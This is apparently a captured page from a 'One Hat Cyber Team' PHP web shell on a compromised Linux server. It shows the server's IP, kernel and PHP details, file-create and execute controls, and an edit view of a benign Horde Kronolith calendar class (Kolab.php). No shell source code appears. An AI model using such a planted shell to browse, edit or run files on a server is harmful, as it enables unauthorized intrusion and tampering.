⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.4
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
kronolith
/
lib
/
Calendars
/
Edit File: Kolab.php
<?php /** * The Kolab specific calendars handler. * * See the enclosed file COPYING for license information (GPL). If you * did not receive this file, see http://www.horde.org/licenses/gpl. * * @author Gunnar Wrobel <wrobel@pardus.de> * @package Kronolith */ class Kronolith_Calendars_Kolab extends Kronolith_Calendars_Base { /** * Runs any actions after setting a new default calendar. * * @param string $share The default share ID. */ public function setDefaultShare($share) { $calendars = $this->_shares ->listShares( $this->_user, array('perm' => Horde_Perms::SHOW, 'attributes' => $this->_user)); foreach ($calendars as $id => $calendar) { if ($id == $share) { $calendar->set('default', true); $calendar->save(); break; } } } /** * Return the name of the default share. * * @return string The name of a default share. */ protected function _getDefaultShareName() { return _("Calendar"); } /** * Add any modifiers required to the share in order to mark it as default * * @param Horde_Share_Object $share The new default share. */ protected function _prepareDefaultShare($share) { $share->set('default', true); } }
Simpan